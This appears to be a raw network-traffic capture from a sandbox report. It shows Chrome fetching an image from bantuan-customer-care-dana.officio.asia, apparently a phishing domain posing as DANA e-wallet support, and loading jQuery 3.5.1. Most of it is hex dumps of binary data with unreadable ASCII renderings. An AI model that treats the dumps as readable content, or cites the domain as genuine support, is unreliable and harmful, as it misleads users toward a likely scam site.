                                                  2024-10-13 17:33:26 UTC1369INData Raw: ce 18 00 fc cb cb 18 8a 7b cc 02 16 d3 e1 44 aa f2 bb 4d 0f 35 ce 1b 98 95 84 bc bf a0 f7 18 65 0b f5 6c 31 9e 66 23 a1 68 0f 7c 9e 70 71 9f bc 66 cd 9a 01 d2 75 fd f4 d3 4f 97 c4 57 fb 28 cf 24 35 dc e3 4b 78 61 cf 9e 3d 4b d0 c1 77 25 f7 12 d2 80 38 20 1c 3e 7c 78 25 74 56 b3 dc 3e 96 1b 0d 6a 11 c4 09 d4 4e df b0 ed f8 59 fb 83 fa 60 06 a9 55 1c 54 89 2b 49 7a f5 ea 95 00 75 d4 2e 26 4f 38 5c 69 e6 89 11 de 9b ae 14 50 91 c9 b8 71 e3 ea 43 9d 13 d4 11 be 1d e6 18 cc 5d 99 37 6f de b3 8a 45 71 85 7c e1 c2 85 ed 91 7f 50 47 f8 76 78 a0 2f 3f 03 55 71 4d bb 02 a6 43 87 35 dd 8e 99 4a 3c 46 46 27 c8 f6 9f d4 26 2a e9 fc a1 3d 73 e6 cc 89 5d bb 76 4d 9b 39 73 e6 23 95 2b 57 ce 61 57 e8 40 c5 3f fe f8 e3 65 31 a3 70 4d ef 8b 97 3c 79 f6 ec d9 2f 05 48 5e a5
                                                  Data Ascii: {DM5el1f#h|pqfuOW($5Kxa=Kw%8 >|x%tV>jNY`UT+Izu.&O8\iPqC]7oEq|PGvx/?UqMC5J<FF'&*=s]vM9s#+WaW@?e1pM<y/H^
                                                  2024-10-13 17:33:26 UTC1369INData Raw: 0a 54 7c e5 95 57 5c dd e0 86 8f 49 0e 7c 54 a4 3f 26 e8 f8 0f c3 a5 c0 56 59 99 15 e9 ae c2 52 8d 54 86 52 c9 62 63 63 e3 d0 51 17 93 22 96 24 6a d4 a8 51 9e 98 98 18 69 f5 22 66 28 3b b0 06 b4 57 92 bd 12 19 d6 19 ce c1 08 65 bd 6c 22 7c bc b3 d5 ad 5b b7 a0 2c bd 0c 5d ad 5a b5 0a 03 8f 3b 64 68 89 06 fa f8 df 30 d2 3e 2f 4b af 42 d7 b3 67 cf 3d 58 57 da 21 9b 26 53 a6 4c 65 61 bd 59 3d ba 73 e7 ce 15 50 88 fc b2 09 35 5d e8 11 40 c7 4f f5 15 b0 45 bc 50 96 10 a6 6c e7 b0 08 35 05 6a 16 29 31 e2 e2 e2 a2 8b 16 2d aa 6a 61 64 c9 1b a3 c4 18 74 18 2a 6a 8a eb a7 4f 9f 4e b6 64 ea 47 24 b0 a0 85 3c 29 0e 78 97 a3 b2 64 c9 a2 22 bb 2d 5f c2 18 44 f4 27 f5 83 bc 49 20 94 ab 40 29 8e 29 89 b0 96 21 8d 35 9c 0e 46 63 96 ec aa 69 67 c6 8c 19 09 5f 69 3c 20 83
                                                  Data Ascii: T|W\I|T?&VYRTRbccQ"$jQi"f(;Wel"|[,]Z;dh0>/KBg=XW!&SLeaY=sP5]@OEPl5j)1-jadt*jONdG$<)xd"-_D'I @))!5Fcig_i<
                                                  2024-10-13 17:33:26 UTC1156INData Raw: 46 e4 98 95 ba d7 98 dc 2a b4 e6 23 8d 00 ea 2f 45 3f 2b 9d 50 8e 90 78 2b f3 37 7e 95 6f c0 a4 ae 17 5c 9f 56 2c 59 b2 e4 bd 72 f9 da 53 51 b9 61 ad 51 8d fe f0 71 f1 24 40 67 76 0d 6e 59 0e 42 6f bd 17 d7 3d 50 93 1c 82 bf 93 33 08 f7 6c d5 87 3a 20 13 54 09 d9 f0 42 e5 c3 a2 5f 51 3c 17 c5 63 51 78 97 c8 07 df 21 01 7b c9 ec 4b 13 7c 0a 58 f1 7c dc a6 4d 9b cf 83 9f 73 e8 72 c4 c0 24 0a 23 bb 65 a3 46 8d 7a 09 0e d0 b6 87 4e 12 9d b3 46 20 f5 21 60 ec f8 a3 b0 60 99 d8 bb 77 ef 56 38 05 e8 47 78 3e 74 d5 9d 29 0f 1f 3a f2 58 2c ec 95 a4 3f 84 3f c8 c7 e9 fb db 08 60 63 d0 cc fa f5 eb f7 b9 1d 92 ba ef 60 97 bf 07 47 2b 0e 69 df be fd 54 94 54 db 18 a7 ee ea d6 a5 0b 11 02 3e 1d 3f c9 01 8b 8b a3 18 5d 37 82 6a 61 25 16 e8 8a 87 48 b6 34 9f 2d 0e 6f 98
                                                  Data Ascii: F*#/E?+Px+7~o\V,YrSQaQq$@gvnYBo=P3l: TB_Q<cQx!{K|X|Msr$#eFzNF !``wV8Gx>t):X,??`c`G+iTT>?]7ja%H4-o


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.449754172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:26 UTC639OUTGET /ast/img/hero.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:27 UTC697INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:26 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 43109
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:29:58 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7074
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wbabKO%2BLuAPTuXMKaYWawkpAC45MwFMPB8Phwgh6ZNfziXyGeTIK2s3HtELhL%2BlK06s%2F3Y2v4FrRKY2qmJ69lpnJSsqmiAHykb9of7UrOFOik07oc%2FEkHf67BRt%2FtpP7%2B8YmfFJbxWMPMj5B0huw9oaRuT1MWMDyyzk%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d2113237d1278d3-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:27 UTC672INData Raw: 50 4b 03 04 14 00 00 00 08 00 a0 83 cc 56 0d 88 ed 8c 7d a7 00 00 a4 a7 00 00 31 00 00 00 53 63 72 65 65 6e 73 68 6f 74 5f 32 30 32 33 30 36 31 32 2d 31 36 32 36 34 31 2d 72 65 6d 6f 76 65 62 67 2d 70 72 65 76 69 65 77 7e 32 2e 70 6e 67 9c 5a 55 57 1c c1 12 5e dc 2d 68 82 05 27 38 81 a0 8b 43 80 e0 ee b2 48 70 77 77 87 c5 dd 5d 83 06 77 0f 0e 41 82 bb c3 e2 0e 0b 97 fb 70 ff c0 ed 73 e6 4c cf 3c 74 97 74 7d 55 f5 cd 44 28 ca 4b 62 a0 7e 42 05 00 00 18 d2 52 e2 ca 00 00 8c c2 fb c5 80 0c fb fe e6 53 8a 84 ec fb 0d c6 49 59 52 14 50 3d 49 72 f4 fe 00 e7 24 2a ad 8a 8c 8c bc b2 a5 b0 09 00 7c 06 48 8b 8b a8 ba 67 9d ea b9 79 93 0c de fa 35 78 41 9d 8f 13 e6 99 5b dd 5a 41 c6 c4 c6 70 30 a2 74 37 04 9e fe 71 f0 ca 14 08 09 06 57 32 0f f1 d8 52 74 37 9f 90 3b
                                                  Data Ascii: PKV}1Screenshot_20230612-162641-removebg-preview~2.pngZUW^-h'8CHpww]wApsL<tt}UD(Kb~BRSIYRP=Ir$*|Hgy5xA[ZAp0t7qW2Rt7;
                                                  2024-10-13 17:33:27 UTC1369INData Raw: 07 bb d3 58 3f 6f fa 75 f2 41 28 bb 7e 72 e9 b8 dc 04 b1 59 a7 73 9b b1 44 23 f3 14 98 49 b5 02 96 97 4c f0 d5 f9 56 c1 d7 7d e5 ce 46 27 ec 05 9b f6 6b e0 c8 1d 7b 4c 65 75 d7 59 40 f7 4b 27 db 54 72 c6 31 94 fd e5 20 66 2b f5 6e 60 59 cc 32 f4 a4 60 51 9a 99 a1 d9 d7 2d c0 ca 21 64 de 72 dc 03 1c 36 b1 e2 e6 f3 5c 72 c2 6d a3 29 d4 13 9a 49 84 7e 48 b5 06 c0 95 44 2f cd f6 1d 22 27 7b 90 91 b0 a0 b0 91 95 0a 0d d2 b8 1f ec be 07 6d 42 e0 2e 3f 07 71 30 f1 f6 6d 43 f5 cf 5a d7 ea 62 b2 23 18 b0 f4 8e f2 bf 74 ae 07 8b b2 55 ff fe ed fb ba cd 9c c9 ed ea fc 1b eb 98 42 16 1d 40 bb 32 4c ff 73 32 c3 67 23 f7 95 cb 66 d4 24 53 42 08 0e f1 a1 82 f9 32 1b 2b c8 6f 03 ef 28 c2 84 fa 6f a3 f9 95 d3 14 04 dc ca 64 ae 14 32 9f 76 b1 f3 e3 c7 18 77 95 c1 c9 f5 23
                                                  Data Ascii: X?ouA(~rYsD#ILV}F'k{LeuY@K'Tr1 f+n`Y2`Q-!dr6\rm)I~HD/"'{mB.?q0mCZb#tUB@2Ls2g#f$SB2+o(od2vw#
                                                  2024-10-13 17:33:27 UTC1369INData Raw: 87 4c 92 2a 20 97 f3 d7 6f d6 9a 53 11 d1 28 17 44 54 65 b6 c2 c1 6e fe be fd 4f 1c d4 90 be fc 38 4a e9 58 fe c7 3b 9c 08 71 cb 1e 9d 52 09 3a ce 5f 71 dc 24 a8 34 1f b4 54 58 64 fd 47 ee 8c 89 e4 62 62 e4 e4 62 90 69 78 ab c7 5a 32 74 fb 89 90 a8 3e 6b 0b 70 15 61 fc 18 83 13 2f 9c e9 ea d2 cf 21 cf 71 b9 33 c6 a7 5d 89 d5 b2 5e 6e 01 dd 1e e4 42 d6 56 3e 97 1e 3a 36 8f 72 50 5a 73 d3 57 0c 48 f0 56 59 ee 05 0e 4f cf 2f cd ac db 7e cf 9f f8 2a cb f8 87 3d 6a 7d 7d 9d 5b df 8f 79 78 a7 b5 23 af ac b6 05 1e e0 4c 63 9a 9f 28 fa 27 3c 5a 0b ae 7e 99 a2 c4 18 a1 ec 6a 7a 59 d8 85 04 eb 7d ff b0 8c af 97 b3 1c ec ff 35 5b 4a 9d f1 f0 9d 59 ae 2f 03 6b f7 66 a6 86 01 9d ac 15 28 a6 dc 56 3a a4 71 5a e4 d6 22 a5 10 c6 7f be 84 70 92 81 e6 ea 0a 8d 8e 45 d3 d6
                                                  Data Ascii: L* oS(DTenO8JX;qR:_q$4TXdGbbbixZ2t>kpa/!q3]^nBV>:6rPZsWHVYO/~*=j}}[yx#Lc('<Z~jzY}5[JY/kf(V:qZ"pE
                                                  2024-10-13 17:33:27 UTC1369INData Raw: 2e 62 b9 59 22 e3 e8 ba b1 ec c4 9d 4b bc d4 94 56 27 27 98 cf 24 a8 8f 9d eb 8a f4 7f ea 99 24 94 58 9a 57 20 93 0e 6d ba ae ed d9 4d 9a 6c 43 28 a1 20 a2 50 39 6a 1e b0 0c 9b 2c 0f 09 5f 6d f3 56 4f 57 27 7a 61 f7 ec 24 7d f0 c8 1d 55 f4 65 63 63 69 b6 eb d3 36 8d 4c 89 7c b6 ba 8a 8a 8a ae 72 02 e5 b4 25 90 0c 0b 1e 16 a6 7b e3 e0 fa d1 5b 3f 77 ea df c6 c6 39 e4 fc fc 3d bc 20 47 47 87 87 e6 16 16 67 a7 87 c8 88 41 e9 dc 9b 35 58 02 0e 8f dc 35 63 0d 95 d9 07 2a 79 fc 7d cd 08 8f 5d f4 7e d3 c3 8f 3b 1d 31 df d5 c8 f8 fe 85 96 e0 cf 48 c8 8f fe 8a 90 28 8c 82 c7 7a 25 f2 7e 5b e1 06 de 8f e3 a6 37 a7 04 cf 1e 39 b7 af 21 84 84 98 9a 9a ee 0c 25 ab a9 aa bf 8f 14 30 b1 86 ae 6e 56 ae 41 5c 6e ae 81 a2 66 5a 66 a6 55 73 65 f6 9d 94 3d 11 2c d3 0d bb 61
                                                  Data Ascii: .bY"KV''$$XW mMlC( P9j,_mVOW'za$}Uecci6L|r%{[?w9= GGgA5X5c*y}]~;1H(z%~[79!%0nVA\nfZfUse=,a
                                                  2024-10-13 17:33:27 UTC1369INData Raw: d2 cb 4d 72 f8 15 ea b5 a2 ad e3 e9 d9 a6 95 32 48 a4 82 17 83 ed d8 a6 4b 53 6c ea e1 21 41 4a aa f7 18 62 9a 86 34 35 bd df aa 89 e9 09 ab 9b 05 22 64 d1 57 17 e8 62 e9 65 03 4e b1 a3 e3 c6 04 53 6d d9 07 ca 5d 90 d0 c5 2d fd 6c 58 81 b8 be e3 f6 e5 ee fe de c1 c1 ee 6e 8b 13 d0 b5 7d cd a8 ce 30 67 f8 7d 55 d3 86 15 27 47 60 f1 ce 90 9a ba 9a 42 3a 1f 73 77 1e db 10 bd aa 45 d5 43 6a f0 9a e5 ef f2 df 82 a1 82 ac ec a0 e3 1b 8a d4 78 d3 f7 6a 83 62 3c 8d 9d 6a 50 2d 3a f1 64 1c 8e e2 f0 18 ce 4e 98 4e 9d da bf ce 74 89 3e b3 76 8b 12 16 80 26 8c 23 2a 91 a2 5b 76 27 3c 8f a7 59 0b cb 16 4e 8a fa 7d 3b 20 8e 1c ce 1e c0 8f 09 90 e8 ad ba 54 e4 ad b5 65 88 90 22 59 38 0f 33 0c ce f8 bd 99 21 8d 56 03 03 28 2a 25 a3 ca 87 e9 0b 60 62 2e 36 de ca 8c 3f eb
                                                  Data Ascii: Mr2HKSl!AJb45"dWbeNSm]-lXn}0g}U'G`B:swECjxjb<jP-:dNNt>v&#*[v'<YN}; Te"Y83!V(*%`b.6?
                                                  2024-10-13 17:33:27 UTC1369INData Raw: 75 db 4f 65 35 ca 85 a9 9f da 47 43 2c 4f cf cf 1c 23 25 3e 84 b7 48 bb 0c ec d5 a7 d4 e1 a9 e4 38 e0 3b 54 98 f0 3d 0a 3e 82 d2 8d 38 f1 e1 a2 a6 68 1a 88 2e 8f 1a 86 59 22 ef 80 af 68 da 34 41 e8 7e 38 75 97 6a 95 26 40 c1 9c 51 f4 59 11 f5 67 02 56 42 87 44 a2 c6 b9 95 34 b4 b3 58 62 5f eb d6 11 dc f7 78 a7 64 c6 05 ac 2f ab ae 78 da 1f 24 94 cb cd 80 ba 94 af a3 53 a6 1b 4a fd 15 9e 76 ac bb 4a d8 62 5f 68 cf be 90 1e 26 aa a5 c5 f2 97 ea db 35 c1 97 67 78 2a 08 46 1a 79 46 48 68 06 89 2f 50 92 8d 34 7f 56 54 a7 96 fb 45 51 8e 24 cd a5 5c e0 79 e5 71 4b 2e 5e ad 25 c0 51 fa b4 9e 30 68 79 1a 75 bc f0 33 36 e2 3b 4d 8c 68 53 66 bd 40 44 66 4d d7 71 fe 4a 17 4d 07 f2 33 5f 5b ca c6 c5 da 59 4e 6f 98 a6 52 7e 0d eb 84 6f 68 d1 c8 0f 59 25 52 19 c9 8a d4
                                                  Data Ascii: uOe5GC,O#%>H8;T=>8h.Y"h4A~8uj&@QYgVBD4Xb_xd/x$SJvJb_h&5gx*FyFHh/P4VTEQ$\yqK.^%Q0hyu36;MhSf@DfMqJM3_[YNoR~ohY%R
                                                  2024-10-13 17:33:27 UTC1369INData Raw: 6f 97 36 f6 9b 7c 55 db 3c 8c 7a ac ae 33 71 d5 f5 67 71 85 92 13 f3 2a 1d d5 50 a6 81 0c 85 c2 77 ef 14 2a 36 91 07 59 1b bc e5 9e 00 64 0a 32 d1 5e ae ff a9 38 0c db 19 b8 bf e4 44 26 54 d9 00 4e 47 3e d6 86 b0 76 e7 f5 fc 6c 26 d6 13 f0 7e c0 fe 53 53 55 dd de d2 21 a8 aa ed 1d 48 33 39 6a a6 d9 11 5c 97 80 3e d2 0c 4c d7 89 e5 d0 4c 97 d4 0b 71 fe fc af e0 54 45 59 b5 28 53 72 de 70 5b 10 20 a5 0e 93 e1 38 e7 53 20 82 78 a4 c0 02 b7 db fb 81 ec 63 9d d5 e8 dd d6 d0 d3 fd f9 1f 17 cb 85 14 c7 00 19 85 fb 00 33 c2 e9 ba aa b9 84 d4 4c fe 69 1d 06 06 06 c7 d5 50 1f 71 2f 2b 46 c6 74 38 e7 0d 6d ff 5d 7e 66 53 31 ed ba 12 46 63 e9 5e e4 0c eb be 95 a9 6b e0 70 5d 1f 79 ac 87 9c 92 94 1a 38 bf 45 9e d1 10 7f 0d e3 af 45 74 49 f6 d3 f0 a8 20 0e 7a 7d 84 da
                                                  Data Ascii: o6|U<z3qgq*Pw*6Yd2^8D&TNG>vl&~SSU!H39j\>LLqTEY(Srp[ 8S xc3LiPq/+Ft8m]~fS1Fc^kp]y8EEtI z}
                                                  2024-10-13 17:33:27 UTC1369INData Raw: 17 20 97 69 2b af 7e 48 e8 35 7e 6d 94 f4 9d 5b ff 4d 65 f5 6b ea 43 9a a6 fb 89 d9 94 b1 c3 86 64 c1 65 30 48 96 11 12 21 54 54 39 78 c8 28 e8 c9 e2 8c ba 47 52 19 a5 ec 13 53 1e 90 9c ab c9 3a 43 bf 42 1f cd e6 a3 5a 0f cd e1 67 7d 5a 2a e6 ed a9 db 46 06 26 0a 49 c8 13 d7 a2 f9 eb a1 2c 4e b7 da b0 d5 6a 1a b8 5f db ac 31 f6 1a c6 ed f0 14 36 bf b3 b7 b4 64 66 bc ea 34 79 fe ee 3e 11 a9 3a aa 09 dd 9e 6f 23 77 62 fc 0d 4b af a7 f9 20 28 bf 2c 10 35 78 0e 81 b4 bc 92 2c 8e 2e 6c 67 fb 2a 2f 09 ce 91 2a 99 8c b1 e1 4b 25 76 f6 91 89 97 07 2a 99 d8 15 59 76 53 42 84 61 9c cd cd 16 7d c3 c8 41 8b de b9 a0 f7 52 fd 17 14 59 26 f1 d9 e7 e2 1b 3e bd 51 cc 16 d4 3c 4c 91 3d c3 a1 e3 a3 8b f5 7d 52 c1 5c 85 7b 65 03 03 03 7a bc 3e c4 28 46 a3 19 4d ce 4f 83 1d
                                                  Data Ascii: i+~H5~m[MekCde0H!TT9x(GRS:CBZg}Z*F&I,Nj_16df4y>:o#wbK (,5x,.lg*/*K%v*YvSBa}ARY&>Q<L=}R\{ez>(FMO
                                                  2024-10-13 17:33:27 UTC1369INData Raw: d1 b3 26 99 c0 48 66 5d 47 23 41 1b b5 13 9e d0 9f 48 2d 64 ec 67 9f 41 38 7c 25 88 ac 59 fe 83 c2 bd 93 85 27 50 14 fe a5 3f a0 30 02 92 e9 76 ea 63 2a 29 cf d7 cc fb 12 46 27 c8 c5 90 0f 7a 0b 38 ad 87 9a 61 09 a4 83 e4 db 45 14 db d6 d7 73 ec e9 f1 22 c4 b7 d9 fb 1e d1 01 aa 76 15 37 a9 86 f5 b8 d6 8c b8 2d a4 e0 b6 2b 87 a0 2e 01 32 14 06 4d ba cc 6d 71 cf cf 71 ac 34 58 71 55 36 b3 20 83 89 44 a1 46 78 4f 18 9c 75 16 a9 ad c7 02 68 e4 1f f4 a2 b8 d4 4a c5 64 b6 12 7b ce 3a 52 80 6d d7 bd 0f 00 cd be 2f 43 5d 5f 77 80 96 e4 1a 68 ff 82 4b ec 14 98 5f 3b 03 21 da 59 f0 f5 6b fa 34 4b 0a 16 84 5e 55 7e fc e9 da ba d6 76 d4 b9 b6 b6 65 cf f3 29 86 ad 2e 6d 01 5f 95 0a 52 37 c8 a7 9b 18 ae 9d 84 bf cf 9a f9 cd 67 ba 39 ac 83 d4 71 4c 24 65 b9 08 97 f1 08
                                                  Data Ascii: &Hf]G#AH-dgA8|%Y'P?0vc*)F'z8aEs"v7-+.2Mmqq4XqU6 DFxOuhJd{:Rm/C]_whK_;!Yk4K^U~ve).m_R7g9qL$e
                                                  2024-10-13 17:33:27 UTC1369INData Raw: 46 fd 0c 7a a7 dd 7e f7 0e 4f 1f 43 c9 4e 9b dc c0 5d 5c 8c e6 db 93 3b 81 6a 57 7d 13 fa 24 99 9e 53 50 16 8f 66 1a 15 7b 6a 75 e5 45 2b 96 da ac 96 a2 3c 43 e5 82 c4 82 29 93 ae 3e ed 24 dd 4b 4b 66 4e fb e5 d5 97 de ff d2 9b 8d 1d 9d 99 14 95 88 87 b1 72 05 4b 12 3a c1 2a 10 00 ce d9 fe 89 70 0b d2 d0 49 95 28 a7 00 91 0d 34 e9 ba 89 a3 56 d3 1e 6e 1c dd 6c 1f 1c f8 e4 1b 08 08 43 47 8c 7a a5 dd f6 6a 9b 7d ba 87 9b 95 cb ce c9 e5 0a 6c 3c 02 68 89 d0 eb fb 6c db fd 16 1f 43 09 f6 1f f1 1e 0c 78 e0 2e d0 2e a7 fe b0 39 19 b2 46 b9 f3 a8 9a f9 c9 63 6c 77 65 ba e7 a4 dd 6a fd fe 85 e7 96 15 16 00 80 c7 95 46 93 b7 5b ad 5f 5b 50 ff ed f3 ce 2c f0 18 ee 4e b9 64 e6 b4 07 be 53 fc cf 37 ff bb 6a cb 0e c6 78 1b 2c 00 58 30 b1 b6 24 d7 63 09 b5 21 c7 14 9e
                                                  Data Ascii: Fz~OCN]\;jW}$SPf{juE+<C)>$KKfNrK:*pI(4VnlCGzj}l<hlCx..9FclwejF[_[P,NdS7jx,X0$c!


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.449755151.101.194.1374435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:26 UTC358OUTGET /jquery-3.5.1.min.js HTTP/1.1
                                                  Host: code.jquery.com
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:26 UTC567INHTTP/1.1 200 OK
                                                  Connection: close
                                                  Content-Length: 89476
                                                  Server: nginx
                                                  Content-Type: application/javascript; charset=utf-8
                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                  ETag: "28feccc0-15d84"
                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                  Access-Control-Allow-Origin: *
                                                  Via: 1.1 varnish, 1.1 varnish
                                                  Accept-Ranges: bytes
                                                  Date: Sun, 13 Oct 2024 17:33:26 GMT
                                                  Age: 3997412
                                                  X-Served-By: cache-lga21981-LGA, cache-nyc-kteb1890073-NYC
                                                  X-Cache: HIT, HIT
                                                  X-Cache-Hits: 66, 1
                                                  X-Timer: S1728840807.932071,VS0,VE1
                                                  Vary: Accept-Encoding
                                                  2024-10-13 17:33:26 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                                  Data Ascii: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
                                                  2024-10-13 17:33:27 UTC16384INData Raw: 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 3d 5b 6b 2c 64 5d 29 2c 61 3d 3d 3d 65 29
                                                  Data Ascii: a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]=[k,d]),a===e)
                                                  2024-10-13 17:33:27 UTC16384INData Raw: 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a
                                                  Data Ascii: {return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.defineProperty(e,this.expando,{value:
                                                  2024-10-13 17:33:27 UTC16384INData Raw: 28 73 2e 74 79 70 65 29 3f 75 2e 63 68 65 63 6b 65 64 3d 73 2e 63 68 65 63 6b 65 64 3a 22 69 6e 70 75 74 22 21 3d 3d 6c 26 26 22 74 65 78 74 61 72 65 61 22 21 3d 3d 6c 7c 7c 28 75 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 3d 73 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 29 3b 69 66 28 74 29 69 66 28 6e 29 66 6f 72 28 6f 3d 6f 7c 7c 76 65 28 65 29 2c 61 3d 61 7c 7c 76 65 28 63 29 2c 72 3d 30 2c 69 3d 6f 2e 6c 65 6e 67 74 68 3b 72 3c 69 3b 72 2b 2b 29 4f 65 28 6f 5b 72 5d 2c 61 5b 72 5d 29 3b 65 6c 73 65 20 4f 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74
                                                  Data Ascii: (s.type)?u.checked=s.checked:"input"!==l&&"textarea"!==l||(u.defaultValue=s.defaultValue);if(t)if(n)for(o=o||ve(e),a=a||ve(c),r=0,i=o.length;r<i;r++)Oe(o[r],a[r]);else Oe(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:funct
